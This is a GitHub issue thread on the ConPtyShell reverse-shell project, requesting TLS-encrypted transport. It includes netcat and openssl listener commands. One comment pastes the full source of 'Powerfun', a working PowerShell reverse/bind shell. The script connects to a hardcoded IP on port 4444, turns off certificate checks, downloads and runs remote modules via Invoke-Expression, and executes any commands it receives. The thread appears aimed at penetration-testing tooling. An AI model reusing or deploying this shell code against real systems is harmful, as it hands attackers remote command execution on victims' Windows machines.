antonioCoco / ConPtyShell

ConPtyShell - Fully Interactive Reverse Shell for Windows
MIT License

New Feature: Secure Transport #3

Status: Open. honze-net opened this issue 3 years ago

honze-net commented 3 years ago

Would it be possible to use TLS? Instead of stty raw -echo; (stty size; cat) | nc -lvnp 3001 use stty raw -echo; (stty size; cat) | openssl s_server -quiet -key key.pem -cert cert.pem -port 3001 on the other side. (You will have to generate a key and a certificate beforehand with openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes once.)

I am working on a script that can catch reverse shells from Linux (plaintext and openssl) and upgrade them automatically. I want to extend it to Windows and found this very nice shell. For nc this should be easy for me to adapt. But secure transport would require ConPtyShell to use a TLS connection. Can you implement this?

antonioCoco commented 3 years ago

It would be a nice feature to add as an optional argument.

It should be possible to do with something like this example: https://docs.microsoft.com/en-us/dotnet/api/system.net.security.sslstream?view=netframework-2.0

I will add it in a future release. If you would like to try, PRs are welcome :D

honze-net commented 3 years ago

Thank you for your response. I will have a look into it. If I find a way to implement this, I will send a PR. 🙂

presianbg commented 2 years ago

Actually, ncat supports the --ssl switch, so there is no need to generate SSL certs beforehand.

Also, I have this non-interactive PowerShell reverse shell stashed from here, which uses an encrypted channel:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun
{
    Param(
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    )
    Process {
    $modules = @()
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]4444
        $listener.start()
        $client = $listener.AcceptTcpClient()
    }
    if ($Command -eq "reverse")
    {
        $client = New-Object System.Net.Sockets.TCPClient("192.168.119.126",4444)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true")
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("192.168.119.126", $null, "Tls12", $false)
        $stream = $sslStream
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    }
    $client.Close()
    $listener.Stop()
    }
}

The question is whether this approach could be implemented for an interactive shell?!